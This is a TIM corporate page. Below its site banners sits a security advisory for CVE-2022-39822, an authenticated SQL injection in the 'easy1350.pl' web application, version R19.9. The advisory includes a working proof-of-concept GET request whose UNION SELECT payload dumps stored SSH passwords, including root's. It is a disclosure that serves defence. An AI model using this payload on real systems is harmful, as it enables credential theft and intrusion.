La nuova immagine di TIM
Una nuova immagine con uno stile dinamico, colori moderni e persone che occupano quasi interamente la scena. Scopri di più
Presentazione dei Risultati H1 2025
Vai alla pagina
La Sostenibilità per TIM
Il Report 2024 accoglie i principi della Corporate Sustainability Reporting Directive (CSRD) ed è incluso nella Relazione Finanziaria e di Sostenibilità. Approfondisci
Ultimi Comunicati Stampa
Leggi gli ultimi comunicati stampa e naviga nell'archivio dell'Ufficio Stampa del Gruppo TIM. Leggi i comunicati
Vulnerability Description: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') – CWE-89
Software Version: R19.9
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39822
CVSv3: 8.8
Severity: High
Credits: Luca Di Giuseppe, Alessandro Bosco, Stefano Scipioni, Massimiliano Brolli
The Web Application is affected by SQL Injection vulnerability. Through the injection of arbitrary SQL statements, a potential attacker can modify query syntax and perform unauthorized (and unexpected) operations against the remote database.
Step-by-step instructions and PoC
A remote user, authenticated to the web application may manipulate the request parameters to exploit error output from the database to manipulate its data. It manipulates the database into generating an error that informs the actor of the database’s structure and afterwards extracts the data contents in the database statement. Please see the examples below for step-by-step instructions to reproduce the vulnerability.
Affected Endpoints
· URL: https://<host>/cgi-bin/R19.9/easy1350.pl?action=edit_master&session=[REDACTED]&id=1host=1
· HTTP Parameter: id, host
Below are the evidences with the vulnerability details and the payloads used.
GET /cgi-bin/R19.9/easy1350.pl?action=edit_master&session=KALEVO19&id=1'+union+SELECT+group_concat(ssh_password,'~~')+FROM+hosts+--&host=1 HTTP/1.1
Host: <host>
Cookie: XSRF=[REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Authorization: Basic [REDACTED]
Connection: close
This first step consists of changing the value parameter to obtain a SQL error:
Then the attacker can manipulate the parameter passed to the function, to discover the names of users, data from other tables, or to eventually guess the database hostname. More in detail, it was possible to extract the ssh password of the root user.
Security Impact
Malicious users can access data processed by the database, and potentially conduct further attacks against the database, other portal’s users and the server machine itself.